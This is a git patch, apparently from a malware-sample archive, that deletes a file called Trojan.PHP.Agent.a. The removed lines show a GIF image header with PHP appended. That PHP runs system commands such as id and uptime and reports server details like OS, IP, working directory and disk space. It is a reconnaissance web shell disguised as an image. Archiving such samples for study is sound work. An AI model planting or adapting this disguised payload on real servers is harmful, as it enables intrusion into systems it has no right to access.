From 315e8bbb02e7c61072a4275023730a60e2038678 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Mon, 2 Nov 2020 23:46:11 -0600 Subject: [PATCH] Delete Trojan.PHP.Agent.a --- PHP/Trojan.PHP.Agent.a | 58 ------------------------------------------ 1 file changed, 58 deletions(-) delete mode 100644 PHP/Trojan.PHP.Agent.a diff --git a/PHP/Trojan.PHP.Agent.a b/PHP/Trojan.PHP.Agent.a deleted file mode 100644 index 5b9ab32..0000000 --- a/PHP/Trojan.PHP.Agent.a +++ /dev/null @@ -1,58 +0,0 @@ -GIF89aY? - -?÷?????EUR???EUR?EUREUR???EUREUR?EUR?EUREUREUREUREURÀÀÀ??????????????????????????????????????????????????????????????????????????????????????????????????3??f?????Ì????3??33?3f?3??3Ì?3??f??f3?ff?f??fÌ?f??????3??f?????Ì????Ì??Ì3?Ìf?Ì??ÌÌ?Ì??????3??f?????Ì???3??3?33?f3??3?Ì3??33?33333f33?33Ì33?3f?3f33ff3f?3fÌ3f?3??3?33?f3??3?Ì3??3Ì?3Ì33Ìf3Ì?3ÌÌ3Ì?3??3?33?f3??3?Ì3??f??f?3f?ff??f?Ìf??f3?f33f3ff3?f3Ìf3?ff?ff3fffff?ffÌff?f??f?3f?ff??f?Ìf??fÌ?fÌ3fÌffÌ?fÌÌfÌ?f??f?3f?ff??f?Ìf???????3??f?????Ì????3??33?3f?3??3Ì?3??f??f3?ff?f??fÌ?f??????3??f?????Ì????Ì??Ì3?Ìf?Ì??ÌÌ?Ì??????3??f?????Ì???Ì??Ì?3Ì?fÌ??Ì?ÌÌ??Ì3?Ì33Ì3fÌ3?Ì3ÌÌ3?Ìf?Ìf3ÌffÌf?ÌfÌÌf?Ì??Ì?3Ì?fÌ??Ì?ÌÌ??ÌÌ?ÌÌ3ÌÌfÌÌ?ÌÌÌÌÌ?Ì??Ì?3Ì?fÌ??Ì?ÌÌ???????3??f?????Ì????3??33?3f?3??3Ì?3??f??f3?ff?f??fÌ?f??????3??f?????Ì????Ì??Ì3?Ìf?Ì??ÌÌ?Ì??????3??f?????Ì???,????Y? - -????H° Á?*\Ȱ¡C??J|q¢C?3N¬h'!Ç?;éQdI"Gj4H2cK?U®$Ør&È?,GÒÌ?0dL?>w$)t'Q¢?â?8TiÒ¥PyÕ)Ó&P--.?F?ørhV©NÃj...tkزW?¢¥?Ö)Ç?dÇÂ5ô¥O---5çF...qm?§gc¢E?²°áÃ?#?; -<?php -function ConvertBytes($number) -{ - $len = strlen($number); - if($len < 4) - { - return sprintf("%d b", $number); - } - if($len >= 4 && $len <=6) - { - return sprintf("%0.2f Kb", $number/1024); - } - if($len >= 7 && $len <=9) - { - return sprintf("%0.2f Mb", $number/1024/1024); - } - - return sprintf("%0.2f Gb", $number/1024/1024/1024); - -} - -echo "bsdcr3w<br>"; -$un = @php_uname(); -$up = system(uptime); -$id1 = system(id); -$pwd1 = @getcwd(); -$sof1 = getenv("SERVER_SOFTWARE"); -$php1 = phpversion(); -$name1 = $_SERVER['SERVER_NAME']; -$ip1 = gethostbyname($SERVER_ADDR); -$free1= diskfreespace($pwd1); -$free = ConvertBytes(diskfreespace($pwd1)); -if (!$free) {$free = 0;} -$all1= disk_total_space($pwd1); -$all = ConvertBytes(disk_total_space($pwd1)); -if (!$all) {$all = 0;} -$used = ConvertBytes($all1-$free1); -$os = @PHP_OS; -echo "We was here ... and u no !!!<br>"; -echo "uname -a: $un<br>"; -echo "os: $os<br>"; -echo "uptime: $up<br>"; -echo "id: $id1<br>"; -echo "pwd: $pwd1<br>"; -echo "php: $php1<br>"; -echo "software: $sof1<br>"; -echo "server-name: $name1<br>"; -echo "server-ip: $ip1<br>"; -echo "free: $free<br>"; -echo "used: $used<br>"; -echo "total: $all<br>"; -exit; - -- GitLab